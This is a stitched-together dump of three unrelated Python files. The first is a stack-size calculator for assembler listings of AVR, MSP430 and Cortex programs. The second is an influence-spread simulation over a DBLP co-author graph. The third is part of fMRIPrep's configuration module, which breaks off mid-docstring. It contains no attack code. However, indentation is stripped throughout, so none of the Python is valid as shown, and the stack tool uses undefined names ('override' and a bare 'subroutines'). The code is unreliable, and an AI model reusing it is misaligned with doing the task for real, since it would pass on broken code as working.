def replace_extension( file_name, extension ):
"replace the extension of file_name as indicated"
return os.path.splitext( file_name )[0] + '.' + extension
def signed( x ):
"return a signed value from an unsigned 32-bit 'bit pattern'"
if x >= 2**31:
x = x - 2**32
return x
def remove( s, x ):
"return s with all ocurrences of a char that appears in x removed"
for c in x:
s = s.replace( c, "" )
return s
def replace( s, x, y ):
"return s with all ocurrences of a char that appears in x replaced by y"
for c in x:
s = s.replace( c, y )
return s
def label( line ):
"return the text enclosed in <> brackets"
return ( line + '<' ).split( '<' )[ 1 ].split( '>' )[ 0 ]
def stripquotes( line ):
"remove surrounding quotes from a line"
line = line.strip()
if( line + " " )[ 0 ] in "\"'":
return line.strip( line[ 0 ] )
else:
return line
# ===========================================================================
class problem:
"a problem that can be related to a specific .lss line"
def __init__( self, line_nr, text, fatal = 1 ):
self.line_nr = line_nr
self.text = "[%4d] %s" % ( line_nr, text )
self.fatal = fatal
def print( self, stop = 1 ):
if self.fatal:
print( "FATAL " + self.text, file = sys.stderr )
if stop:
exit( -1 )
else:
print( "WARNING " + self.text, file = sys.stderr )
# ===========================================================================
class assembler_line:
"an lss assembler line (not being an empty line, label, etc.)"
def __init__( self, cpu, line, line_nr, subroutine ):
self.cpu = cpu
self.line = line
self.line_nr = line_nr
self.subroutine = subroutine
self.call = 0
self.extra = 0
self.is_call = 0
self.is_data = 0
self.my_problems = []
self.target = None
# de-code the line a bit
# address opcode arguments
# 20: 22fa movs r2, #250 ; 0xfa
if 0: print( line )
line = line.strip() + "\t\t"
self.address = line.split( ":" )[ 0 ]
self.opcode = line.split( "\t" )[ 2 ]
self.arguments = line.split( "\t", 3 )[ 3 ]
self.arguments = remove( self.arguments, "{} ;([" ).rstrip( '\t' )
self.arguments = replace( self.arguments, "\t<", "," ).split( "," )
# 67d: 74206948 65726568 7c000000 Hi there...
if ( line.count( "\t" ) == 3 ) or ( self.opcode.startswith( "." )):
self.is_instruction = 0
if self.opcode == ".word":
# address opcode arguments
# 4: 00000051 .word 0x00000051
self.is_data = 1
self.value = signed( int( self.arguments[ 0 ], 0 ) )
return
self.is_instruction = 1
def problem( self, s, fatal = 1 ):
self.my_problems.append(
problem(
self.line_nr, "[%s] %s" %
( self.subroutine.name_demangled, s ),
fatal ) )
def parse( self, level ):
self.level = level
self.delta = 0
if not self.is_instruction:
return
# save register values at entry
self.old_registers = self.subroutine.registers.copy()
if self.cpu == "msp430":
self.parse_msp430()
elif self.cpu == "avr":
self.parse_avr()
elif self.cpu == "cortex":
self.parse_cortex();
else:
print( "unknown cpu [%s]" % self.cpu )
exit( -1 )
self.level += self.delta
def parse_msp430( self ):
# invalidate any value stored for the destination register
if len( self.arguments ) > 0:
target = self.arguments[ 0 ]
if target in self.subroutine.registers:
del self.subroutine.registers[ target ]
return
def parse_avr( self ):
# invalidate any value stored for the destination register
if len( self.arguments ) > 0:
target = self.arguments[ 0 ]
if target in self.subroutine.registers:
del self.subroutine.registers[ target ]
value = ( self.line + ';' ).split( ';' )[ 1 ]
if self.opcode == "push":
self.delta = +1
elif self.opcode == "pop":
self.delta = -1
elif (
( self.opcode == "rcall" )
and ( self.arguments[ 0 ] == ".+0" )
):
# rcall .+0
self.delta = +2
elif self.opcode == "call":
# call 0x96 ; 0x96 <main>
self.target = self.line.split( '<' )[ 1 ].split( '>' )[ 0 ]
self.extra = 2
self.is_call = 1
elif self.opcode == "in":
# in r28, 0x3d ; 61
if int( value ) == 61:
# pretend that the target is a 16-bit register
self.subroutine.registers[ target ] = - self.level
elif self.opcode == "sbiw":
# sbiw r28, 0x0e ; 14
if target in self.old_registers:
# pretend that the register is 16 bits
self.subroutine.registers[ target ] = \
self.old_registers[ target ] - int( value )
elif self.opcode == "adiw":
# adiw r28, 0x0e ; 14
print( self.line )
print( self.old_registers )
if target in self.old_registers:
# pretend that the register is 16 bits
print( self.old_registers[ target ] + int( value ) )
self.subroutine.registers[ target ] = \
self.old_registers[ target ] + int( value )
elif self.opcode == "out":
# out 0x3d, r28 ; 61
if int( value ) == 61:
source = self.arguments[ 1 ]
if source in self.old_registers:
# stack grows down
self.delta = ( - self.old_registers[ source ] ) - self.level
else:
if self.subroutine.name != "__vectors":
# stack is set to its initial value in __vectors
self.my_problems.append( problem(
self.line_nr, "register %s value unknown" % source ) )
return
def parse_cortex( self ):
"second pass: parse() must be called once "
"for each instruction, in order"
self.opcode = self.opcode \
.replace( "add.w", "addw" ) \
.replace( "sub.w", "subw" )
# invalidate the value stored in the target register
if self.opcode != "str":
target = self.arguments[ 0 ]
if target in self.subroutine.registers:
del self.subroutine.registers[ target ]
if self.opcode == "bl":
self.target = self.line.split( '<' )[ 1 ].split( '>' )[ 0 ]
self.is_call = 1
if self.opcode == "b.n":
self.target = self.line.split( '<' )[ 1 ].split( '>' )[ 0 ]
if self.target.find( "+" ) == -1:
self.is_call = 1
elif self.opcode == "blx":
reg = self.arguments[ 0 ]
d = self.old_registers.get( reg, None )
if ( d != None ) and ( d == 0x1FFF1FF1 ):
# call to ROM IAP, ignore
self.problem( "IAP call, assumed to use no stack space", 0 )
else:
self.problem( "indirect call" )
elif self.opcode.startswith( "mov" ):
# movs r3, #250 ; 0xfa
if self.arguments[ 1 ].startswith( "#" ):
self.subroutine.registers[ self.arguments[ 0 ] ] = \
int( self.arguments[ 1 ][ 1: ] )
elif self.opcode.startswith( "lsl" ):
# lsls r3, r3, #4
if self.arguments[ 1 ].startswith( "r" ) \
and ( len( self.arguments ) > 2 ) \
and self.arguments[ 1 ] in self.old_registers \
and self.arguments[ 2 ].startswith( "#" ):
self.subroutine.registers[ self.arguments[ 0 ] ] = \
self.old_registers[ self.arguments[ 1 ] ] * \
( 2 ** int( self.arguments[ 2 ][ 1 : ] ) )
elif self.opcode == "push":
# push {r7, lr}
self.delta = 4 * len( self.arguments )
elif self.opcode == "pop":
# push {r7, pc}
self.delta = - 4 * len( self.arguments )
elif self.opcode == "ldr" \
and ( self.arguments[ 1 ] == "pc" ):
# ldr r7, [pc, #24] ; (40 <_Z4keepv+0x20>)
self.subroutine.registers[ self.arguments[ 0 ] ] = \
self.subroutine.data[ int( self.arguments[ 3 ], 16 ) ]
elif ( self.opcode in ( "addw", "subw" ) ) \
and ( len( self.arguments ) >= 3 ) \
and ( self.arguments[ 0 ] == "sp" ) \
and ( self.arguments[ 1 ] == "sp" ):
if self.arguments[ 2 ].startswith( "#" ):
# subw sp, sp, #1756 ; 0x6dc
self.delta = int( self.arguments[ 2 ][ 1: ] )
if self.opcode == "addw":
# stack grows down: add decreases stack use
self.delta = - self.delta
elif ( self.opcode in ( "add", "sub" ) ) \
and ( len( self.arguments ) >= 2 ) \
and ( self.arguments[ 0 ] == "sp" ):
if self.arguments[ 1 ].startswith( "#" ):
# sub sp, #404 ; 0x194
self.delta = int( self.arguments[ 1 ][ 1: ] )
elif self.arguments[ 1 ].startswith( "r" ):
# add sp, r3
reg = self.arguments[ 1 ]
d = self.old_registers.get( reg, None )
if d == None:
self.my_problems.append( problem(
self.line_nr, "register %s value unknown" % reg ) )
else:
self.delta = d
else:
self.my_problems.append( problem(
self.line_nr, "format not recognized" ) )
if self.opcode == "add":
# stack grows down: add decreases stack use
self.delta = - self.delta
elif self.arguments[ : 1 ].count( "sp" ):
self.my_problems.append( problem( self.line_nr, "sp as argument" ) )
else:
pass
def __str__( self ):
return "[%6d:%6d:%6d:%6d:%6d] %s" % (
self.delta, self.level, self.extra,
self.call, self.total, self.line
)
# ===========================================================================
class subroutine:
"a single assembler subroutine"
# stack administration for each instruction:
# delta = change in stack use caused by the instruction
# eg: push = +1 (avr) or +4 (cortex)
# base = stack use at the start of the instruction
# = running total of delta's
# extra = temporary stack during execution of the instruction itself
# eg: call = +2 (avr), but bl = 0 (cortex)
# call = stack use of the routine called by this instruction
# peak = peak stack use during execution of the instruction
# and/or the called subroutine
# The stack use of a subroutine is the highest peak of all its instructions.
def __init__( self, cpu, subroutines, filt ):
self.name = None
self.name_demangled = None
self.calc_stack_use = None
self.line_nr = -1
self.lines = []
self.my_problems = []
self.cpu = cpu
self.subroutines = subroutines
self.data = {}
self.registers = {}
self.instructions = 0
self.called = 0
self.is_root = 0
self.filt = filt
self.level = 0
def add( self, line, line_nr ):
"add a single lss line to the subroutine"
if( line[ 0 ] != " " ):
# subroutine label?
if self.name == None:
self.line_nr = line_nr
self.name = line.split( '<' )[ 1 ].split( '>' )[ 0 ]
self.name_demangled = demangle( self.filt, self.name )
else:
decoded_line = assembler_line( self.cpu, line, line_nr, self )
self.lines.append( decoded_line )
self.instructions += decoded_line.is_instruction
if decoded_line.is_data:
self.data[ int( decoded_line.address, 16 ) ] = int( decoded_line.value )
def parse( self ):
"is called once (by stack_use) to parse the subroutine"
level = 0
for line in self.lines:
line.parse( level )
level = line.level
self.my_problems.extend( line.my_problems )
def stack_use( self ):
if self.calc_stack_use == None:
self.parse()
self.calc_stack_use = 0
for line in self.lines:
line.call = 0
if line.is_call:
if line.target in self.subroutines:
target = self.subroutines[ line.target ]
target.called += 1
line.call = target.stack_use()
else:
self.my_problems.append(
problem( self.line_nr,
"target [%s] unknown" % line.target ))
line.total = line.level + line.extra + line.call
self.calc_stack_use = max ( self.calc_stack_use, line.total )
return self.calc_stack_use
def __str__( self ):
all = ''
all += "[%4d] : %s\n" % ( self.line_nr, self.name_demangled )
all += " %s\n" % self.name
all += " called: %d stack use: %d\n" % ( self.called, self.stack_use() )
all += " delta base extra call peak\n"
for line in self.lines:
all += " %s\n" % line
return all
# ===========================================================================
class application:
"the appliation inf as read from a .lss file"
def __init__( self, cpu, file_name, root_names, filt ):
self.cpu = cpu
self.root_names = root_names
self.my_problems = []
self.subroutines = {}
if self.cpu == "msp430" :
self.non_breaking_labels = [
"__crt0_init_bss",
"__crt0_call_init_then_main",
"_msp430_run_init_array",
"_msp430_run_preinit_array",
"_msp430_run_fini_array",
"_msp430_run_array",
"_msp430_run_done",
"register_tm_clones",
"__do_global_dtors_aux",
]
self.known_not_called = [
]
elif self.cpu == "avr" :
self.non_breaking_labels = [
"__ctors_end",
"__do_copy_data",
"__do_clear_bss",
".do_clear_bss_loop",
".do_clear_bss_start",
]
self.known_not_called = [
"__bad_interrupt",
"_exit",
"__stop_program",
]
elif self.cpu == "cortex":
self.non_breaking_labels = [
]
self.known_not_called = [
]
else:
print( "unknown cpu [%s]" % self.cpu )
exit( -1 )
f = open( file_name, "r" )
next = subroutine( cpu, self.subroutines, filt )
line_nr = 0
for line in f.readlines():
line = line.replace( "\n", '' )
line_nr += 1
# print( "[%s]" % line )
if line == "":
pass
elif ( line[ 0 ] == "0" ) \
and not ( label( line ) in self.non_breaking_labels ) \
and not self.msp430_ignore( label( line )) \
and next.name != None :
self.subroutines[ next.name ] = next
next = subroutine( cpu, self.subroutines, filt )
next.add( line, line_nr )
elif( line[ 0 ] in " 0" ):
next.add( line, line_nr )
else:
pass
self.subroutines[ next.name ] = next
for name in self.root_names:
self.mark_as_root( name )
def msp430_ignore( self, label ):
return (
( label[ 0 ] == '.' )
or ( label == "L0\1" ))
def mark_as_root( self, name ):
if name in self.subroutines:
self.subroutines[ name ].called += 1
self.subroutines[ name ].is_root = 1
else:
self.my_problems.append(
problem( 0, "root [%s] not found" % name, 1 ))
def problems( self ):
if self.my_problems == []:
for name, subroutine in sorted( self.subroutines.items() ):
if ( subroutine.level != 0 ):
problem( subroutine.line_nr,
"[%s] has a non-0 stack delta" % subroutine.name_demangled, 0 )
if ( subroutine.called == 0 ) \
and ( subroutine.instructions > 0 ) \
and not ( subroutine.name in self.known_not_called ):
self.my_problems.append(
problem( subroutine.line_nr,
"[%s] is never called" % subroutine.name_demangled, 0 ))
self.my_problems.extend( subroutine.my_problems )
return self.my_problems
def stack_use( self, name ):
if name in self.subroutines:
return self.subroutines[ name ].stack_use()
else:
self.my_problems.append( problem( 0,
( "root [%s] not found" % name ), 1 ))
return 0
def expanded_call_tree_view( self, name, prefix = "", step = " " ):
all = ""
all += prefix + name
for call in subroutines[ name ].calls:
all += expanded_call_tree_view(
self, call.target, prefix + step, step )
return all
def annotated_view( self ):
all = ""
for name in self.root_names:
all += "[%s] uses %d stack bytes\n" % ( name, self.stack_use( name ) )
all += "\n"
for name, subroutine in sorted( self.subroutines.items() ):
all += str( subroutine ) + "\n"
return all
def subroutines_list( self ):
all = []
for name, subroutine in sorted( subroutines.items() ):
all.append( name )
return all
def handle_problems( self, abort = 1 ):
px = self.problems()
fatals = 0
if len( px ):
for p in px:
p.print( 0 );
if p.fatal:
fatals += 1
if fatals and abort:
print( "%d fatal problems found\n" % fatals )
exit( -1 )
# ===========================================================================
def arguments_parser():
parser = argparse.ArgumentParser(
description = \
'Calculate required stack size from an lss file.'
'By default, a file bmptk_culated_size_stack.c file is created '
'that contains one line:\n'
' unsigned char bmptk_stack[ 40 ] '
'\__attribute__ ((section(".bmptk_stack")));'
)
parser.add_argument(
'cpu',
#type = string,
help = 'target cpu: cortex, avr, msp430' )
parser.add_argument(
'root',
help = 'root function for which the stack size is calculated' )
parser.add_argument(
'input_file',
help = '.lss input file' )
parser.add_argument(
'template',
help = 'The file that is copied to the generated stack output_file. '
'Any ocurrence of STACK_SIZE is replaced by the calculated stack size.' )
parser.add_argument(
'output_file',
help = 'The name of the file to which the output (copy of the template) is written' )
parser.add_argument(
'-annotate',
help = 'create annotated version of the lss file' )
parser.add_argument(
'-filt',
help = 'FILT executable to use to demangle C++ names' )
parser.add_argument(
'-size',
type = int,
help = 'SIZE overrides the calculated stack size' )
parser.add_argument(
'-delta',
type = int,
default = 0,
help = 'DELTA is added to the calculated stack size' )
parser.add_argument(
'-verbose',
action='store_true',
help = 'show the options used' )
return parser
def analyse(
annotate, filt,
cpu, root_names, file_name,
stack_template, stack_output,
size, delta,
verbose
):
if verbose:
print( "annotate : %s" % annotate )
print( "filt tool : %s" % filt )
print( "CPU : %s" % cpu )
print( "roots : %s" % root_names )
print( "lss file : %s" % file_name )
print( "stack template : %s" % stack_template )
print( "stack file : %s" % stack_output )
print( "size override : %s" % size )
print( "size delta : %s" % delta )
app = application( cpu, file_name, root_names, filt )
if annotate:
file_from_text( annotate, app.annotated_view() )
app.handle_problems()
if size != None:
n = override
print( "stack size override = %d" % override )
else:
n = delta + app.stack_use( root_names[ 0 ] )
print( "stack size is %d" % n )
file_from_text(
stack_output,
stripquotes( text_from_file( stack_template ) )
.replace( 'STACK_SIZE', str( n )))
def run():
parser = arguments_parser()
results = parser.parse_args()
analyse(
results.annotate,
results.filt,
results.cpu,
[ results.root ],
results.input_file,
results.template,
results.output_file,
results.size,
results.delta,
results.verbose
)
sys.setrecursionlimit( 100000 )
threading.stack_size( 200000000 )
thread = threading.Thread( target = run )
thread.start()
|
simulate.py
|
# -*- coding: utf-8 -
import queue
import random
import networkx as nx
from multiprocessing import Process
import multiprocessing
influence_sum=multiprocessing.Value("i",0)
def process():
influence = 0
for i in range(0, 50):
influence += simulate(set(seedset[:]))
with influence_sum.get_lock():
influence_sum.value += influence
def simulate(seedset):
active = []
for i in range (0, g.number_of_nodes()):
active.append(0)
simul_inf = 0
q1 = queue.Queue()
k1 = len(seedset)
for it in seedset:
q1.put(it)
active[it] = 1
simul_inf += 1
while q1.qsize() != 0:
expend = q1.get()
for neigh in g[expend]:
randDouble = random.random()
if randDouble > 0.1:
continue
if active[neigh] == 1:
continue
if active[neigh] !=1:
active[neigh] = 1
q1.put(neigh)
simul_inf += 1
return simul_inf
g = nx.Graph()
for line in open("DBLP-new.txt"):
line = line.split()
g.add_edge(int(line[0]), int(line[1]), weight = float(line[2]))
seedset="3335 3344 166 14689 13940 30094 864 3297 13841 13810 15325 3325 3345 1826 1832 13952 44 7226 2485 27137 6318 35861 1447 3399 1817 9400 17110 3299 2005 7006 9799 10277 13931 6325 1196 2976 66101 6327 7437 8622 28674 60436 2545 6317 2911 4298 1499 2142 7429 67246"
seedset = seedset.split(' ')
seedset=list(map(int,seedset))
process_list = []
for j in range(20):
process_list.append(Process(target=process))
process_list[-1].start()
for p in process_list:
p.join()
print('influence = '+str(influence_sum.value/1000))
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *fMRIPrep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<fmriprep_dir>/sub-<participant_id>/log/<run_unique_id>/fmriprep.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~fmriprep.config.to_filename` function to allow writting out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../fmriprep/data/tests/config.toml
:language: toml
:name: fmriprep.toml
:caption: **Example file representation of fMRIPrep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~fmriprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from fmriprep import config
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other conveniency actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(
os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None
)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
CONFIG_FILENAME = "fmriprep.toml"
try:
set_start_method("forkserver")
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import sys
import random
from uuid import uuid4
from time import strftime
from pathlib import Path
from nipype import __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("FMRIPREP_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("FMRIPREP_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/nipreps/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
else:
import logging
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "fmriprep-docker" if _docker_ver else "docker"
del _cgroup
_fs_license = os.getenv("FS_LICENSE")
if not _fs_license and os.getenv("FREESURFER_HOME"):
_fs_home = os.getenv("FREESURFER_HOME")
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(
os.getenv(
"TEMPLATEFLOW_HOME", os.path.join(os.getenv("HOME"), ".cache", "templateflow")
)
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024 ** 3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if (
_oc_limit in ("0", "n/a")
and Path("/proc/sys/vm/overcommit_ratio").exists()
):
_oc_limit = "{}%".format(
Path("/proc/sys/vm/overcommit_ratio").read_text().strip()
)
except Exception:
pass
# Debug modes are names that influence the exposure of internal details to
# the user, either through additional derivatives or increased verbosity
DEBUG_MODES = ("compcor",)
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True, ignore=None):
"""Store settings from a dictionary."""
ignore = ignore or {}
for k, v in settings.items():
if k in ignore or v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
elif hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *fMRIPrep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*fMRIPrep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config(
{
"monitoring": {
"enabled": cls.resource_monitor,
"sample_frequency": "0.5",
"summary_append": True,
}
}
)
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
"check_version": False, # disable future telemetry
}
}
)
if cls.omp_nthreads is None:
cls.omp_nthreads = min(
cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8
)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
sloppy = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
debug = []
"""Debug mode(s)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fmriprep_dir = None
"""Root of fMRIPrep BIDS Derivatives dataset. Depends on output_layout."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *fMRIPrep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_layout = None
"""Layout of derivatives within output_dir."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = f"{strftime('%Y%m%d-%H%M%S')}_{uuid4()}"
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fmriprep_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"output_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
if cls.bids_database_dir:
_db_path = cls.bids_database_dir
if not _db_path.exists():
logging.getLogger("cli").warning(
f"Creating PyBIDS database directory: {_db_path}"
)
else:
_db_path = cls.work_dir / cls.run_uuid / "bids_db"
_db_path.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
re.compile(r"^\."),
),
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4])
if not isinstance(v, Query) and "Query" in v
else v
for k, v in filters.items()
}
if "all" in cls.debug:
cls.debug = list(DEBUG_MODES)
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = "register"
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *fMRIPrep*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
